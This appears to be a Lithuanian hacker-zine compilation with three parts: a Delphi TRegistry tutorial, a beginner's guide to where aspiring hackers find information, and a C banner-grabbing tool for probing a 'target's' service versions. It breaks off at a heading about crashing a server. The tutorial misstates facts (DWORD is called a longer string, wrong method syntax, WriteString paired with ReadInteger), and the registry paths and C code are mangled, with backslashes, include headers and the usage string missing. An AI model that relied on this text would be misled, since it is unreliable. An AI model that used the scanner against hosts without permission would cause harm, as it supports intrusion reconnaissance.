HKEY_USERS: Na shiame skyriuje yra saugoma bendri vartotojo nustatymai, jeigu kompu naudojasi keli zhmones ir atsiranda dar vienas naujas vartotojas.

HKEY_CURRENT_CONFIG: Shitas skyrius yra skirtas saugoti dabartiniam aplinkos sukonfiguravimui ( fontai, interneto nustatymai ir t.t. ir pan.)

HKEY_DYN_DATA: Shitas skyrius saugo tai, ko ash dar neishsiaishkinau =:( sorry…

3. Registro irashu tipai.

STRING: Irashas, kuriame saugoma informacija yra zhodine. Tai gali buti visokie zhodzhiai, keliai (paths) nurodyti iki tam tikru programu ar pagalbiniu failu, kompo pavadinimai, kam registruota programa (!) registracijos numeriai (!!!) ir t.t. ir pan.

BINARY: Irashas, kuriame saugoma informacija yra dvejetainio pavidalo, tai gali buti visokiausi kodai arba nustatymai, kuriems reikia tik dvieju reikshmiu ( 0 ir 1 arba ne ir taip ).

DWORD: Irashas panashus i STRING, tik jame informacija gali buti daug daug ilgesne.

4. Pradedame programuoti.

PASTABA: norintys padaryti ka nors su shiuo komponentu turetu tureti daugiau negu minimalius pagrindus Delphi programavime.

Na rashysiu shi skyriu remdamasis Delphi 5 programavimo kalba. Taigi… norint priversti programa ka nors irashyti i registra reikia zhinoti kokiu komponentu ji naudosis ir kokia komanda sius registrui.Delphi aplinkoje yra TRegistry komponentas ( yra dar pora: TRegIniFile, TRegistryIniFile, tachiau TRegistry yra universaliausias). Shis komponentas yra nevizualus ir jo nera ne vienoje paleteje, taigi ji reikia isideti kaip kintamaji bei irashyti i USES sarasha. pvz.:

uses Registry, …;

procedure lameriolauzhimas(Sender: TObject);var Reg: TRegistry;Begin…

Taig pazhiurime i ji giliau. Kaip ir kievienas Delphi komponentas jis turi savybes (Properties), ju yra penkios, metodus (Methods), kuriu yra labai daug, tachiau neturi “ivykiu” ??? (Events). Kiti , bet ne visi komponentai turi ivykius.Savybes: Access, CurrentKey, CurrentPath, LazyWrite ir RootKey.

1. Access: shia savybe yra nustatomas priejimo lygis dirbant su registro raktais ir irashais. Savybes sintakse tokia: TRegistry.Access(). Shtai visi jo parametrai:

KEY_ALL_ACCESS visishko priejimo lygis (parametru KEY_READ, KEY_WRITE ir KEY_CREATE_LINK visuma);

KEY_READ ledzhia tik nuskaityti duomenis ish tam tikro irasho ar rakto;

KEY_WRITE ledzhia tik irashyti i registra naujus raktus ir irashus;

KEY_QUERY_VALUE garantuoja prieima prie bet kokio rakto ( bet ne irasho );

KEY_ENUMERATE_SUB_KEYS shis parametras “suskaichiuoja” registro raktus bei irashus;

KEY_NOTIFY shis parametras pranesha apie raktu bei irashu pasikeitimus;

KEY_SET_VALUE ledzhia sukurti naujus irashus raktuose;

KEY_CREATE_SUB_KEY ledzhia sukuti naujus raktus ( bet ne irashus );

KEY_CREATE_LINK sukuria nuorodas i kitus raktus, irashus ar failus diske;

KEY_EXECUTE apriboja registro raktu bei irashu naudojima iki read-only rezhimo.

Shios savybes tipas yra LongWord;

2. CurrentKey: shia savybe galima nustatyti koks registro raktas yra konkrechiu momentu atidarytas. Demesio, jog operacijos programoje atliekamos su registru paveiks tiktais ta rakta kuris yra tuo momentu atidarytas OpenKey arba OpenKeyReadOnly metodu (apie juos veliau).Shios savybes tipas yra HKEY;Shiai savybei negalima priskirti jokio reikshmes, bet ja galima panaudoti shtai taip:Edit1.Text := Reg.CurrentKey;

3. CurrentPath: labai panashy savybe i CurrentKey, tik shiuo atveju jeigu komanda pavyksta, tai grazhintas rezultatas bus ne tik to rakto pavadinimas, bet ir kelias iki jo ( pvz.: HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun =:). Shios savybes tipas yra STRING;Kadangi shiai savybei negalima priskirti jokio reikshmes tai ja galima pritaikyti shitaip:Edit1.Text := Reg.CurrentPath;

4. LazyWrite: na shi savybe yra itin gera, kai jus nenorite atidarineti kitu registro raktu ir padaryti irasha registre reikiamoje vietoje… t.y. jums nereikia atidarineti raktu tiesiog pasakete programai, jog norite tokio irasho tokioje vietoje ir viskas (ankschiau minejau, jog irashus galima daryti tik ten kur yra atidaryti raktai, dabar “tik ten” pakeiskite i “beveik tik ten” =:). Shios savybes tipas yra BOOLEAN (mano megiamiausias, kas taip o kas nea ??? =:).Sintakse: Reg.LazyWrite := True;

5. RootKey: nurodo kuris aukshchiausias hierarchijos lygis turetu buti atidarytas ( pagal nutylejima: HKEY_CURRENT_USER );Sintakse: Reg.RootKey := HKEY_CURRENT_USER;

Dabar visi shio komponento metodai (abeceles tvarka):

CloseKey: uzhdaro esamu momentu atidaryta rakta, kai visos reikalingos “proceduros” atliko savo darba su juo.Sintakse: Reg.CloseKey;

Create: pats svarbiausias metodas. Sukuria pati TRegistry komponenta programoje. Pradines savybes bei parametrai buna shie:RootKey := HKEY_CURRENT_USER (kaip ir pagal nutylejima), LazyWrite := True, dar galima nurodyti AAccess parametra, kuris bus priskiriamas Access savybei, pagal nutylejima jis yra KEY_ALL_ACCESS.Sintakse: Reg.Create(AAccess); //parametro AAccess gali ir nebuti

CreateKey: sukuria nauja rakta. Shio rakto struktura gali buti absoliuti ir releatyvi. Skirtumas: absoliutus rakto vardas prasideda backslachu “” ir yra pradedamas kurti nuo TRegistry.RootKey reikshmes, o releatyvus yra pradedamas kurti nuo konkrechiu momentu atidaryto rakto.Sintakse: Reg.CreateKey(rakto_vardas);

DeleteKey: ishtrina nurodyta rakta. PASTABA: Windows95 operaciineje sistemoje DeletKey metodas ishtrina visus raktus esanchius tame rakte (jeigu supratote tai gerai), o WindowsNT 4.0 OS tai kiekvienam raktui reikia kviesti atskira DeleteKey metoda (tas turbut labai uzhknistu).Sintakse: Reg.DeleteKey(rakto_vardas);

DeleteValue: ishtrina nurodyta irasha (bet ne rakta).Sintakse: Reg.DeleteValue(irasho_vardas).

Destroy: labai jau zhiaurus metodas. Uzhdaro konkretu rakta ir sunaikina TRegistry komponenta programoje ishlaisvindamas atminti, kuri buvo skirta TRegistry komponentui programoje.Sintakse: Reg.Destroy; (jau girdzhiu laidotuviu marsha – cirkas baigesi =:).

GetDataInfo: gauna irasho (!) registre informacija.Sintakse: Reg.GetDataInfo(irasho_vardas,irasho tipas{deja ji turesite irashyti patys});Kadangi shiuo metodu jus tikrinsite registro irasho tipa, tai grazhintas rezultatas yra arba True arba False;Galimi tipai:

rdUnknown: nezhinomas registro irahso tipas;

rdString: registro irashas yra papraschiausias ANSI irashas.

rdExpandString: registro irashas yra taip pat ANSI tipo. Shis tipas saugo WinShell’o kintamuosius arba nuorodas i kitu registro irashus arba WinShell’o failus.

rdInteger: irashas yra papraschiausias 32bit skaichius.

rdBinary: irashe saugoma informacija yra dvejetainiame pavidale (10011100020MB100011010101010 =:)

GetDataSize: nustato irasho dydi baitais atidarytame rakte. Jeigu shi operacija pavyksta, tai funkcija parodo irasho dydi baitais, jeigu ne tai parodytas skaichius yra -1.Sintakse: Reg.GetDataSize(irasho_vardas).

GetDataType: o chia tai metodas (!). Parodo irasho tipa (jums jau nebereikes nustatineti jo su GetDataInfo metodu) konkrechiu momentu atidarytame rakte. Irasho tipai tokie patys kaip ir GetDataInfo metode.Sintakse: Reg.GetDataType(irasho_vardas).

PASTABA: Prie visu Delphi tipu esanchiu kodo pradchioje reikia nurodyti TRegDataType parametrus:type TRegsDataType= (rdUnknown, rdString, rdExpandString, rdInteger, rdBinary);

GetKeyInfo: pateikia informacija apie konkretu atidaryta rakta. Kaip ir GetDataType kodo pradzhioje reikes irashyti TGetKeyInfo parametrus:type TRegKeyInfo = record NumSubKeys: Integer; MaxSubKeyLen: Integer; NumValues: Integer; MaxValueLen: Integer; MaxDataLen: Integer; FileTime: TFileTime; end;

Funkcijos sintakse tokia: Reg.GetKeyInfo(norimas_parametras);

Shio metodo parametrai:

NumSubKeys: nurodo raktu skaichiu esanchiu atidarytame rakte;MaxSubKeyLen: ilgiausia rakto varda simboliais;NumValues: irashu skaichius;MaxValuelen: ilgiausio irasho vardas;MaxDataLen: ilgiausia irasho reikshme;FileTime: laikas, kai paskutini karta buvo rashoma i nagrinejamaji rakta;

Jeigu shi funkcija nepavyksta, tai visoms reikshmems suteikiama reikshme lygi 0.

GetKeyNames: pateikia sarasha visu raktu esanchiu nurodytame rakte. Sarashas pateikiamas TStrings tipo kintamaisiais (t.y. jus neikishite shito sarasho i TListBox komponenta).Sintakse: Reg.GetKeyNames(vieta_kur_parodyti_sarasha);

GetValueNames: labai panashi i GetKeyNames metoda, bet shi funkcija pateikia irashu sarasha. Sarashas taip pat pateikiamas TStrings tipo kintamaisiais.Sintakse: Reg.GetValueNames(vieta_kur_parodyti_sarasha);

HasSubKeys: nustato ar konkretus raktas turi raktu savyje.Sintakse: Reg.HasSubKeys := True; //shio metodo paramtero tipas yra BOOLEAN

KeyExists: nustato ar nurodytas raktas egzistuoja.Sintakse: Reg.KeyExists := True; //tipas – BOOLEAN

LoadKey: sukuria nauja rakta po vienu ish aukshchiausiu raktu ir uzhkrauna i ji informacija ish nurodyto failo.Sintakse: Reg.LoadKey(rakto_pavadinimas, failo_vardas);

PASTABA: priesh naudojant shi metoda RootKey turi buti priskirtas HKEY_USERS arb HKEY_LOCAL_MACHINE.

MoveKey: perkelia visus rakto porakchius bei irashus i kita vieta suteikiant jam nauja varda, beje reikia nurodyti dar ar reikia senaji rakta ishtrinti ar nea.Sintakse: Reg.MoveKey(senas_rakto_vardas, naujas_rakto_vardas, ishtrinti(true arba false));

Po kopijavimo ar perkelimo naujasis raktas yra uzhdaromas. Po Windows NT kiekvienas rakto poraktis turi buti atskirai nukopijuotas arba perkeltas.

OpenKey: atidaro nurodyta rakta.Sintakse: Reg.OpenKey(rakto_vardas, sukurti(true arba false));

Gali buti atveju, kad nurodytas raktas neegzistuos, tada “sukurti” parametro vietoje irashysime true.Jeigu mes norime atidaryti rakta nustatymu nuskaitymui programoje, tai naudosime “sukurti” parametra false reikshme, nes mes jug nenoresime per nauja shi rakta sukurti.

OpenKeyReadOnly: atidaro nurodyta rakta vien skaitymui (!). Atidaryto rakto saugumo lygis bus KEY_READ.Sintakse: Reg.OpenKeyReadOnly(rakto_vardas);

ReadBinaryData: nuskaito dvejetaine informacija ish nurodyto irasho.

Sintakse: Reg.ReadBinaryData(irasho_vardas, kintamasis, buferio_dydis);Chia kintamasis yra programos kintamasis, kuriam reikes priskirti gauta reikshme, buferio_dydis yra skaichius, kuris nurodo atminties dydi baitais, kurioje bus laikoma “ishtraukta” informacija.

ReadBool: nuskaito logine informacija ish nurodyto irasho.

Sintakse: Reg.ReadBool(irasho_vardas);Jeigu funkcija sekminga, tai jus gaunate reikalinga informacija ish registro, jeigu nea, tai jus gaunate praneshima apie klaida.

ReadCurrency: na nebijokite, tai tikrai nevaliuta, bet ash pac dar neishsiaishkinau, kad chia per metodas sorry.

ReadDate: nuskaito data ish nurodyto irasho.

Sintakse: Reg.ReadDate(irasho_vardas);Naudokite shi metoda, tada, kai i irasha irashete reikshme su WriteDate procedure(apie tai veliau). Jeigu irashas nesaugo savyje reikshmes “panashios” i data, tai tada yra parodomas praneshimas apie klaida.

ReadDateTime: panashi i ReadDate, tik be datos ji dar nuskaito ir laika. Salygos tokios pachio sintakse tokia pati.

ReadFloat: nuskaito slankaus kablelio skaichiu. Jeigu irashas neturi savyje tokio skaichiaus yra parodomas praneshimas apie klaida.Sintakse: Reg.ReadFloat(irasho_vardas);

ReadInteger: nuskaito skaichiu Integer tipo. Salygos bei sintakse tokia pati kaip ir pas ReadFloat.

ReadString: nuskaito simbolius (zhodzhius) ish nurodyto irasho. Shis metodas tinka tada, kai irashas buvo padarytas WriteString arba WriteExpandString metodu (apie juos veliau).Sintakse: Reg.ReadString(irasho_vardas);

ReadTime: nuskaito laika ish registro irasho. Naudokite shi metoda tik tada, kai irasha padarete WriteTime metodu (apie ji veliau).Sintakse: Reg.ReadTime(irasho_vardas);

RegistryConnect: kvepia hackinimu. Taip ir yra. Shi komanda prisijungia prie kito kompo registro.Sintakse: Reg.Registry.Connect(//kompo_vardas);

PASTABA: priesh naudojantis shiuo metodu reikia RootKey savybe priskirti prei HKEY_USER arba HKEY_LOCAL_MACHINE.

RenameValue: shis metodas pakeichia irashui priskirta reikshme i nauja.Sintakse: Reg.RenameValue(sena_reikshme, nauja_reikshme)PASTABA, jeigu jus pervardinsite viena irasho tipa i kita, tai jums nebus jokio ispejimo ir jis bus pakeistas (!).

ReplaceKey: pakeichia vien rakta kitu ish naujo failo, senaji irashydamas i kita faila.Sintakse: Reg.ReplaceKey(rakto_vardas, failas_i_kuri_bus_perrashytas_raktas, failas_ish_kurio_bus_irashytas_naujas_raktas);

SVARBI PASTABA: failas_i_kuri_bus_perrashytas_raktas turi buti padarytas su metodu SaveKey, kurio sintakse yra sekanti:Reg.SaveKey(rakto_vardas, failo_pavadinimas_su_reg_pletiniu);Taigi bendra ReplaceKey sintakse butu kazhkas panashaus i:Reg.Replacekey(rakto_vardas,SaveKey(rakto_vardas,failo_pavadinimas_su_reg_pletiniu),failas_ish_kurio_bus_irashytas_naujas_raktas);

RestoreKey: metodas kuris atkuria rakta ish failo ankschiau sukurto su SaveKey metodu. Bendra sintakse: Reg.RestoreKey(rakto_vardas, SaveKey(failas_ish_kurio_bus_atgamintas_raktas));

SaveKey: na jau anskchiau minejau, kad tai metodas, kurio yra atidaromas vienas ish raktu ir ishsaugomas i konkretu faila su pletiniu *.reg.

UnLoadKey: ishkrauna viena ar kita rakta ish registro nemodifikuodamas failo (jeigu toks yra) ish kurio tas raktas buvo uzhkrautas LoadKey metodu. Priesh naudojant shia funkcija RootKey savybe turi buti nustatyta i HKEY_USERS arba HKEY_LOCAL_MACHINE.Sintakse: Reg.UnLoadKey(rakto_vardas);

ValueExists: tikrina ar nurodytas irashas egzistuoja registre. Tipas BOOLEAN.Sintakse: Reg.ValueExists(irasho_vardas);

WriteBinaryData: padaro irasha nurodytu vardu dvejetainio tipo. T.y. jame saugoma informacija yra dvejetainiame pavidale.Sintakse: Reg.WriteBinaryData(irasho_vardas, kintamasis, buferio_dydis);Visi kiti parametrai(kintamasis, buferio dydis) yra apzhvelgiami metode ReadBinaryData.

WriteBool: padaro irasha nurodytu vardu loginio tipo (True, False), nors i registre irashas yra padaromas kaip dvejetainio tipo. Jeigu shi funkcija nepavyksta jokie irashai nera padaromi registre ir yra parodomas praneshimas apie klaida.Sintakse: Reg.WriteBool(irasho_vardas, true/false);

WriteCurrency: nu jug sakiau, kad nezhinau ka reishkia ReadCurrency, tai nezhinau ka reishkia ir shitas metodas.

WriteDate: padaro irasha, kurio reikshme yra data.Sintakse: Reg.WriteDate(irasho_vardas, reikshme);Reikshme yra TDateTime tipo kintamasis. Galimos kintamojo reikshmes:0 – laikas bus pradetas skaichiuoti nuo 1899 12 30 12:00 vidurdieni.2.75 – laikas bus pradetas skaichiuoti nuo 1900 01 01 6:00 vakare.-1.25 – laikas bus pradetas skaichiuoti nuo 1899 12 29 6:00 ryte.35065 – laikas bus pradetas skaichiuoti nuo 1996 01 01 12:00.

WriteDateTime: padaro irasha, kurio reikshme yra laikas.Sintakse: Reg.WriteDateTime(irasho_vardas, reikshme);Reikshme yra TDateTime tipo kintamasis. Kintamojo reikshmes yra tokios pachios tiktais shiuo atveju procedura data irasho ir laika ir data.

WriteExpandString: padaro irasha kuris nukreipia i kitus sistemos kintamuosius, failus arba registro irashus.Sintakse: Reg.WriteExpandString(irasho_vardas, reikshme);Reikshme chia yra paprastas “kelias” iki vieno ar kito kintamojo ar failo sistemoje ir pan.

WriteFloat: padaro irasha su slankaus kablelio skaichiumi. Tokiu pvz kaip pi:=3.1415296 arba 1 inch := 2.54 cm ir t.t. ir pan.Sintakse: Reg.WriteFloat(irasho_vardas, reikshme);Reikshme yra skaichius kuri jus norite irashyti. Shi irasha jus veliau galite “nuskaityti” su ReadFloat metodu.

WriteInteger: padaro irasha su sveikuoju skaichiumi. Shi irasha jus veliau galite “nuskaityti” su ReadInteger metodu.Sintakse: Reg.WriteInteger(irasho_vardas, reishme);Reikshme – jusu norimas skaichius.

WriteString: padaro irasha su simbliu reikshme (zhodzhiais). Shi irasha jus veliau galite “nuskaityti” su ReadInteger metodu.Sintakse: Reg.WriteString(irasho_vardas, reikshme);Na nebeaishkinsiu ka reishkia reikshme =:).

WriteTime: padaro irasha, kurio reikshme yra laikas. Viskas tas pats kaip ir WriteDate ar WriteDateTime, tik dabar jum padarys irasha, kuriame yra tik (!) data.

Shtai visi TRegistry komponento metodai bei savybes. Ash nenorejau jums rashyti “paspausk chia, rashyk taip”. Ash jums trumpai apibudinau kiekviena savybe bei metoda, tikiuosi su jais zhinosite ka daryti ir padarysite keliu savybiu bei metodu “mirtina jungini” =:).

5. Idomiausios vietos registre:

HKEY_CURRENT_USERSoftwareMicrosoftNotepadHKEY_CURRENT_USERSoftwareMicrosoftTelnetHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerFileExts (visi failu pletiniai ir su kuo jie turetu buti atidaromi)HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerShell Folders (windozu katalogu tokiu kaip Favorites Templates Startup ir t.t. keliai (paths) windozu kataloge =:)~ skanu…HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell Folders (vartotojo shell katalogai).HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionGrpConvMapGroups (kazhkas panashaus i Startmenu katalogus bei taskbar quick launch konfiguracija)HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones (viskas kas susije su Desktop ikonomis tokiomis kaip My Computer, NetWork neighborhood ir pan.HKEY_LOCAL_MACHINESOFTWARECLASSESCLSID{645FF040-5081-101B-9F08-00AA002F954E} (chia galite pakeisti savo shiukshliu dezhes pavadinima ir apibudinima).

6. Naudota literatura: Delphi 5 help failas. Registra ishnarshiau pats.

Tikiuosi patiks.

Sekantis planuojamas darbas turetu buti apie komponentu rashyma (taip par Delphi aplinkoje).

Bloody yours 20MB1 =:)

43. KUR PRADEDANCZIAJAM HACKERIUI IESKOTI INFO?

REM: Shis textas skirtas pradedantiesiems ir naujokams technologiniamepogrindyje. Todel, please, j00s, visi kieti s00per 31337 hackeriailameriais?’, etc. :)Visi mes kazhkada tokiais buvome. Juk reikia nuo kazhko pradeti 🙂

H/P kanaluose IRC, mailing-list’uose ir newsgroup’uose gan dazhnai tenkamatyti pradedancziuju ir wannabe hackeriu klausimus tipo “Kaip taptihackeriu?”, “Kaip isilauzhti i sistema?”, etc. Ir jeigu tokiu klausimuautorius nera ishjuokiamas (kas dazhniausiai ir atsitinka), taivienintelis atsakymas, kurio jis gali susilaukti – “RTFM!”

Tiems, kas nesupranta paaishkinsiu: RTFM – tai anglishkos frazes‘Read The Fuckin’ Manual’ sutrumpinimas. Taigi, lietuvishkai tai skambetumazhdaug ‘Skaityk !@#$%^ instrukcija!’.Bet kur, po velniu, tas instrukcijas gauti?

Vienas ish hackeriu etikos teiginiu skelbia – neprashyk kitu tokiosinformacijos, kuria pats gali susirasti. Taigi, netgi jeigu jums vis deltopasiseke ir kazhkas ish hackeriu nutare jums padeti – jis greicziausiapasufleruos, kur ieshkoti informacijos, bet visa kita jums teks darytipatiems: dirbkite savo galva, mastykite, darykite ishvadas.O shiame tekstuke ash pameginau apibendrinti, kaip ir kur jums susirastitai, ko ieshkote.

Visu pirma – heh, mokykites kalbu. Jeigu be gimtosios lietuviu galitelaisvai (na beveik :] ) skaityti anglishkai ir rusishkai – jau turitevisus shansus susirasti faktishkai bet kokia info, nes, kaip zhinote,Interneto kalba yra anglu, o dauguma specializuotu kompiuteriniu knygumusu knyginuose yra rusu kalba.

Pirkite rimtas knygas apie kompiuterius: operaciniu sistemu, protokolu,programavimo kalbu aprashymus, zhinynus, vadovelius, knygas, susijusias sukompiuteriu saugumu. Ishsiaishkinkite kur jusu mieste yra techninesliteraturos knygynas (Kaune siulycziau uzheiti i Smaltijos knygyna Kestuciogatveje prieshais Raudonojo Kryzhiaus ligonine; Vilniuje – PenkiuKontinentu knygyna ir kt.) ir pinigus, kuriuos paprastai praoshiatesavaitgalio fiestose investuokite i geras knygas. SKAITYKITE nupirktasknygas – shiaip skaitymas atima gana daug laiko, bet, pasistengus, laikoskaitymui galima surasti – skaitykite troleibuse, automobilyje pakliuve ikamshti, laukdami priemimo pas daktara ar kirpykloje, guledami vonioje(heh) ar netgi per pamokas ar paskaitas (kai kurios ju ishtikrujunobodzhios, ar ne?). Taigi, RTFM!

Nueikite i Technikos biblioteka arba i vieshaja biblioteka ir panarshykitekataloga kompiuterinem temom: kompiuteriai, informatika, informacijossaugumas, programavimo kalbos, informacines technologijos,telekomunikacijos, etc. RTFM!

Knygos yra gerai, bet jos turi viena esmini trukuma – geros knygos apiekompiuterius kainuoja nemazhus pinigus (pazhistu zhmoniu, kurieishleidzhia knygoms po 300 – 400 Lt per menesi) Tuo tarpu, beveik visajums reikalinga informacija galima gauti nemokamai – taip, teisingai, ishInterneto.

Lengviausiais budas – pasitelkti i pagalba paieshkos stotis (searchWeb’a, kitos – newsgroup’uarchyvus, kur saugoma viskas, kas buvo ten postinta per kelis metus. Taippat Internete saugomi geriausiu hackeriu maillist’u archyvai.

Naudojantis paieshkos stotimis yra du svarbus dalykai, i kuriuos reiktuatkreipti demesi: kokia paieshkos stotimi naudotis, ir kokia paieshkostaktika remtis.

Mano asmenine nuomone, geriausios paieshkos stotys yra dvi: Web’ui –Altavista (http://altavista.digital.com arba http://www.av.com), onewsgroup’ams – Dejanews (http://www.dejanews.com), bet jus galiteishsirinkti sau patogiausia paieshkos stoti: linkus i beveik visas galiterasti adresu http://sgk.tiac.net/search/

Bet kaip efektyviausiai pasinaudoti paieshkus stocziu siuloma paslauga?Tiesog ivedus i paieshkos lauka zhodi “hacker” ar netgi “how to hack” jusgausite brashkilijonus nuorodu i webo puslapius, kur rasite pretenzingagrafika su kaukolem ir liepsnom, vargonu muzika bei su gramatinem klaidomparashytus teiginius “Ash, ble, kietaz haxoriuz, taigi joos lamai, turitebucziuoti man su@ine, nes ash esu pi%$dec ELITAS!” ir kruvom nuorodu itokius pat puslapius. Tacziau juose kazhkaip nelebai yra naudingosinformacijos. Heh, sveiki atvyke i wanabe-hackeriu pasauli 😉

Taigi, pirmoji taisykle – sukonkretinkite savo paieshka. Rashykite ne “howto hack”, bet kazhka panashaus i “password attacks over NetBIOS”Antra – naudokite “advanced search” opcija, kuri leistu naudotimatematines logikos taisykles paieshkos sukonkretinimui. (Matematineslogikos funkcijos “and”-ir, “or”-arba “not”-ne pades zhymiai susiaurintipaieshkos rezultatus atsizhvelgiant i jusu poreikius. Smulkiau apiematematines logikos funkcijas pasiskaitykite vadovelyje, o czia ash tiktrumpai apzhvelgsiu ju panaudojima paieshkai.)“And” funkcija duos tik tuos rezultatus, kurie atitinka VISUS jusuuzhklausimo zhodzhius. Shi funkcija tapati opcijai “all”.“Or” – visus kurie atitinka BENT VIENA uzhklausimo zhodi. Shi funkcijatapati opcijai “any”.“Not” – rezultatai, kurie atitinka shioje skilty irashyta uzhklausima busignoruojami.

Be paieshkos stocziu yra dar vienas geras budas rasti geras vietelesInternete: aptikus gera saita, tiesiog sekti ten esancziais linkais(nuorodom), ir jums nereikes patiems knistis po tukstanczius paieshkosstocziu ishmestu rezultatu, nes kazhkas galbut jau padare tai uzh jus.Keletas pavyzdzhiu:anglishkai (tik keli ish daaaugelio pvz.):http://www.cert.orghttp://www.silitoad.orghttp://www.rootshell.comrusishkai:http://www.hackzone.ru (geriausias hack’ saitas rusu kalba)lietuvishkai:http://www.pogrindis.net (heh)

Vienas asmeninis patarimas: narshydami puslapius ishjunkite visasmultimedia opcijas savo browseryje, arba naudokite txt-only browserius

tipo Lynx. Jums juk reikia INFORMACIJOS, ir jus nenorite gaishti laiko,kol krausis visi tie JPG su kaukolem ir animuotom liepsnom backgrounde :)bei shustros muzikeles.

Taigi, rimtuose H/P puslapiuose jus galesite rasti textuku, krie yraparashyti hackeriu ir dazhnai buna labai informatyvus. Ypacz vadinamiejiFAQ (Frequently Asked Questions) – Dazhniausia Uzhduodami Klausimai (iratsakymai). Tacziau, tushczias textu kolekcionavimas neduos jokios naudos.Skaitykite juos. RTFM!

Na o kaip gi del manual’u? Juk tam, kad ‘..isilauzhti i sistema’ jums,visu pirma reikia tureti nebloga zhiniu bagazha apie tai, kaip tossistemos veikia, apie protokolus ir tinklus, etc.

GERIAUSIAS, taip, geriausias shaltinis shiuo atzhvilgiu yra RFC.RFC reishkia “Request for Comment” – “Uzhklausimas komentarui”. Shispavadinimas kiles dar ish tu laiku, kai kompiutriu tinklai buvo kudikystesstadijoje, ir entuziastai faktishkai kure interneta. Tacziau dabar RFC –tai tiksliausia, rimcziausia ir ishsamiausia info apie tai, kaip veikiaInternetas.

Idealiausias variantas butu perskaityti ir isiminti visus RFC, bet dabaryra serbentilijonai tu RFC’u o kai kuriems ish musu dar reikia laikomiegui ir valgymui 🙂 Taigi, tie, kas neturi fotografines atminties irmariu laisvo laiko turetu atsirinkti, ka skaityti, kad rastu atsakymus iji dominanczius klausimus. Neblogas startas – ishsamus visu RFC’u sarashassu ju pavadinimais, kuri rasite adresu:ftp://ftp.tstt.net.tt/pub/inet/rfc/rfc-index

Arba RFC apie RFC’us (!) – taip, yra toks dokumentas, RFC 825, kuris,faktishkai, yra RFC’u specifikacija. Kad ji rastumete, tiesiog iAltavistos uzhklausimo lauka irashykite “RFC 825” (su kabutemis, butenttaip, kaip parashyta czia). Tokiu pat budu galite rasti bet koki RFC,kurio numeri jus zhinote.

Tacziau RFC’us kartais gana sunku suprasti. Ish kur zhinoti, koki RFC’askaityti, kad rastume atsakyma i musu klausima? O isheitis – RFC’u grupe,kuri vadinasi “FYIs”. Tai nera specifikacijos, o tiesiog kitu RFC’upaaishkinimai. (Uf, jaucziuosi kaip koks Shvento Rashto aishkintojas :] )Kur gauti tuos FYI? Pazhiurekim, ka sako shiuo klausimu RFC apie FYI(RFC 1150) {vertimas}: FYI galima isigyti per FTP ish NIC.DDN.MIL,nurodzhius kelia FYI:mm.txt, arba RFC:RFCnnnn.txt (kur “mm” yra FYInumeris o “nnnn” yra “RFC” numeris). Isiloginama per FTP su usernameANONYMOUS ir password GUEST. NIC taip pat teikia automatinio pashtopaslauga tiems, kas negeli naudotis FTP. Siuskite uzhklausima adresuSERVICE@NIC.DDN.MIL ir ‘subject’ skilty nurodykite FYI ar RFC numeriformatu “Subject: FYI mm” arba “Subject: RFC nnnn”.

Bet netgi dar geresnis dalykas – RFC’ai susieti tarpusavyje hiperlinkais(nuorodom) Webe adresu http://www.FreeSoft.org/Connected/Tai yra labai cool sourc’as. Nors jame nera sudeti visi RFC’ai, bet shiamesaite yra vadovas ir naujokui patogus nuorodu i RFC’us ‘komplektas’.

Taip pat norecziau pamineti dar keleta adresu, susijusiu su kompiuteriniusistemu saugumu:

http://csrc.nist.gov/secpubs/rainbow/http://GANDALF.ISU.EDU/security/security.html – security library

Operaciniu sistemu problemos ir skyles su ataku pavyzdzhiais:

http://www.netspace.org/lsv-archive/bugtraq.html – bugtraq archyvaihttp://www.ntbugtraq.com – ntbugtraq

RTFM!

Bet kartais netgi perskaiczius kruva technines literaturos mes nerandamatsakymo i musu klausima ar problemos sprendimo. Tada lieka vienintelisbudas – paklausti ishmananczio zhmogaus. Czia ir gelbsti e-konferencijos,IRC bei newsgroup’ai.

Newsgroup’u pvz.:alt.securityalt.2600alt.hackers

maillist’u pvz.:bugtraq mailing list(ishsiuskite maila adresu listserv@netspace.org laishko turiny parashezhodi help ir sekite instrukcijas)

IRC kanalu pvz.:#hakeriai#hackers

Info apie newsgroup’us, mail-listus ir IRC kanalus galite rasti webe perta paczia Altavista, i uzhklausimo lauka irashe kazhka panashaus i“security mailing lists”, etc.

Dar vienas dalykas – nueikite i http://www.scip.orgTai yra ‘Society of Competitive Information Professionals’ saitas. Galsusilauksite pagalbos ten? :]

Creditai: thanx Carolin Meinel, kurios rashliava ash kadaise labaisekmingai maitinausi ir shiame texte yra daug ref i GTmHH :)(http://www.happyhacker.org)

Knowledge is power!ww0lf

Automatizuok savo darbus- patikrink servisu headerius

Ieskant tam tikros rusies servisu nera patogu kiekviena syki jungtis prie aukos telnetu ir tikrinti servisu headerius (Pvz. telnet nasa.mil 21). Tokiu atveju geriausia pasirasyti programa kuri pati automatizuoja tokius veiksmus. Tad viena diena pamegnau as tokia parasyti:

/* http://www.zemrsn.lt/uid0 – code (c) SataN testheader.c Sitas toolsas skirtas palengvinti targeto servisu versiju patikrinima ir pan. Ji kompilioti reikia taip: #gcc testheader.c -o testheader Naudotis juo paprastai galima tai:

#./testheader arba berods galima kazkaip panasiai : #cat hostu.sarasas.IP | while read ip, port ; do ./testheader $ip $port; done | tee headeriu.sarasas

Tada bus nuskaitomas hostu ir portu sarasas is failo ir bandoma prie junktis. rezultatas bus kitame faile.

*/

#include #include #include #include #include #include #include #include #include #include #include

int main (int argc, char **argv) { struct hostent *hp; struct in_addr addr; struct sockaddr_in s; char buf[280]; int p;

if (argc < 3 ) { printf (“usage: %s .n”, argv[0]); exit (1); }

hp = gethostbyname (argv[1]); if (!hp) exit (1);

bcopy (hp->h_addr, &addr, sizeof (struct in_addr)); p = socket (s.sin_family = AF_INET, 1, 0); s.sin_port = htons ( atoi( argv[2] ) ); s.sin_addr.s_addr = inet_addr (inet_ntoa (addr)); if ( !connect (p, &s, sizeof (s))) { alarm (5); read (p, buf, 255); close (p); printf (“Connected to %s (on port %s)…nTarget headre is:nn%snn”, argv[1], argv[2], buf); } else { perror(“Can’t conncet to host”); } return 0; }

Nesu tikras kad sis toolas yra visiskai geras- nenustebsiu jei rasite vabaliuku- bugu.

44. Serverio nukepimas

